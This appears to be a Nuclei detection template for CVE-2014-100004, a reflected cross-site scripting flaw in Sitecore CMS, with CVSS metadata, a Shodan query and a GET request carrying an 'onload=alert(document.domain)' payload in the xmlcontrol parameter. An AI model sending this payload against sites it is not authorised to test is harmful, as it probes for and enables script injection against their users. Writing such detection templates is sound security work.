漏洞描述
Sitecore CMS contains a cross-site scripting vulnerability via the "special way" of displaying XML Controls directly, which allows for a Cross Site Scripting Attack.
id: CVE-2014-100004
info:
name: Sitecore CMS - Cross-Site Scripting
author: DhiyaneshDK
severity: medium
description: |
Sitecore CMS contains a cross-site scripting vulnerability via the "special way" of displaying XML Controls directly, which allows for a Cross Site Scripting Attack.
reference:
- https://vulners.com/securityvulns/SECURITYVULNS:DOC:30273
- https://web.archive.org/web/20151016072340/http://www.securityfocus.com/archive/1/530901/100/0/threaded
- https://nvd.nist.gov/vuln/detail/CVE-2014-100004
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2014-100004
epss-score: 0.00385
epss-percentile: 0.59001
cwe-id: CWE-79
cpe: cpe:2.3:a:sitecore:sitecore.net:*:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: sitecore
product: sitecore.net
shodan-query: html:"Sitecore"
tags: cve,cve2014,xss,sitecore,cms,vuln
http:
- method: GET
path:
- "{{BaseURL}}/?xmlcontrol=body%20onload=alert(document.domain)"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<body onload=alert(document.domain) />"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022066ec3f0f23d2ff78353055c8eaf9c1b8a0b9951825c208233d811353f2b088ec022100e2b2ced91a24d6df659b3404362e9b17d65275e9ee4a9421dccbe4311ea1d19f:922c64590222798bb761d5b6d8e72950